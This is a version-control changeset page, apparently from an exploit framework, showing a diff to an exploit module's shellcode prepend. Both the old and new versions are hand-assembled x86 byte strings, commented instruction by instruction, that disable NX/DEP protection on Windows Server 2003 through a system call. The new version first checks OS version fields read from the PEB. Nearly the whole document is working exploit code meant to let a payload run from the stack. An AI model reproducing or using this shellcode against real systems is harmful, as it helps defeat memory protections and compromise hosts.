Navigation

Changeset 4866

Timestamp:

05/04/07 08:50:44 (1 year ago)

Author:

hdm

Message:

Updated prepend from topo

Files:

r4849	r4866
33	33	# Disable NX on 2k3 to upload data on the stack
34	34	# (service crashes if the stack is switched to the heap)
35		"\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270
36		"\x80\x39\x02" + # cmp byte ptr [ecx], 2
37		"\x75\x15" + # jmp after
38		"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
39		"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
40		"\x6a\x04" + # push 4
41		"\x51" + # push ecx
42		"\x6a\x22" + # push 22
43		"\x6a\xff" + # push -1
44		"\x6a\xff" + # push -1 (padding)
45		"\xff\x12", # call dword ptr[edx]
	35	"\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB
	36	"\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5
	37	"\x75\x30" + # jnz after
	38	"\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2
	39	"\x75\x27" + # jnz after
	40	"\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)
	41	"\x76\x1b" + # jbe after
	42	"\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]
	43	"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
	44	"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
	45	"\x6a\x04" + # push 4
	46	"\x51" + # push ecx
	47	"\x6a\x22" + # push 22
	48	"\x6a\xff" + # push -1
	49	"\x6a\xff" + # push -1 (padding)
	50	"\xff\x12", # call dword ptr[edx]
46	51	'StackAdjustment' => -10000,
47	52